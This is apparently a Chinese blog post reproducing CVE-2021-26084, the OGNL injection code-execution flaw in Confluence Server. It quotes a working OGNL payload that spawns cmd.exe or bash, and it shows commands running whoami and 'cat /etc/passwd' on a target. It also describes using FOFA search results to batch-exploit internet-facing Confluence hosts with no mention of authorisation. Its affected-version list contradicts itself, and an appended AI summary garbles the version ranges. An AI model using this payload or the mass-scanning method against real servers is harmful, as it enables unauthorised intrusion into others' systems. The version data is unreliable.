Confluence CVE-2021-26084远程代码执行漏洞复现

本文介绍了Confluence Server的严重OGNL注入漏洞CVE-2021-26084,该漏洞可能导致任意代码执行。受影响版本包括多个Confluence版本。文中提供了受影响和不受影响的版本列表,以及漏洞的POC和复现步骤。建议用户检查并升级到不受影响的版本以防止攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、漏洞概述

近日,Atlassian官方发布了Confluence Server Webwork OGNL 注入漏洞(CVE-2021-26084)的安全公告,远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码,CVSS评分为9.8。请相关用户尽快采取措施进行防护。

Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。

参考链接:https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

二、影响范围

受影响版本

  • Confluence < 6.13.23
  • 6.14.0 ≤ Confluence < 7.4.11
  • 7.5.0 ≤ Confluence < 7.11.6
  • 7.12.0 ≤ Confluence < 7.12.5
  • Confluence < 7.13.0

不受影响版本

  • Confluence=6.13.23
  • Confluence=7.4.11
  • Confluence=7.11.6
  • Confluence=7.12.5
  • Confluence=7.13.0

三:漏洞POC

1、https://github.com/FanqXu/CVE-2021-26084

2、https://github.com/h3v0x/CVE-2021-26084_Confluence/

3、https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

四:漏洞复现

我用的是https://github.com/FanqXu/CVE-2021-26084的poc进行验证的,将github的poc下载下来。

 关键POC部分如下所示:

 "queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022" + command + "\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}

确认好你的python环境,使用pip安装如下库:

import requests
import sys
import os
import urllib3
import argparse
from bs4 import BeautifulSoup

import html5lib

 遇到安装BeautifulSoup库报错如下的话,记得指定源下载即可解决报错问题。

命令如下:

pip install bs4 -i https://pypi.douban.com/simple --trusted-host pypi.douban.com

环境准备就绪,即可运行脚本验证漏洞了。

首先验证是否存在漏洞,如下是漏洞已存在。

python PoC.py -u xxxx 

 

然后再执行命令,比如执行whomai试试。

python PoC.py -u xxxx -e whoami

 

执行cat /etc/passwd.

python PoC.py -u xxxx -e "cat /etc/passwd"

 五:fofa批量

关键字搜索app="ATLASSIAN-Confluence"

 然后使用fofa工具导出结果存到urls.txt,再使用https://github.com/FanqXu/CVE-2021-26084的poc进行批量验证即可。

使用的命令如下:

python PoC.py -f urls.txt

参考文章:

1、http://blog.nsfocus.net/atlassian-confluence/

2、https://github.com/FanqXu/CVE-2021-26084

3、https://github.com/h3v0x/CVE-2021-26084_Confluence/

Confluence漏洞是指在Confluence Server或Data Center的特定版本中存在的安全漏洞,攻击者可以通过构造恶意数据执行OGNL表达式进行注入攻击,最终控制服务器。\[1\]受影响的版本包括Confluence Server & Confluence Data Center < 6.13.23、6.13.23 < Confluence Server & Confluence Data Center < 7.11.6、7.11.6 < Confluence Server & Confluence Data Center < 7.12.5、7.12.5 < Confluence Server & Confluence Data Center < 7.4.11。\[1\]具体的漏洞复现和影响范围可以参考Atlassian官方的安全公告链接:https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215。\[3\] #### 引用[.reference_title] - *1* [confluence的几个高危漏洞复现](https://blog.csdn.net/xiayu729100940/article/details/128197797)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Confluence CVE-2021-26084远程代码执行漏洞复现](https://blog.csdn.net/weixin_39997829/article/details/120179000)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值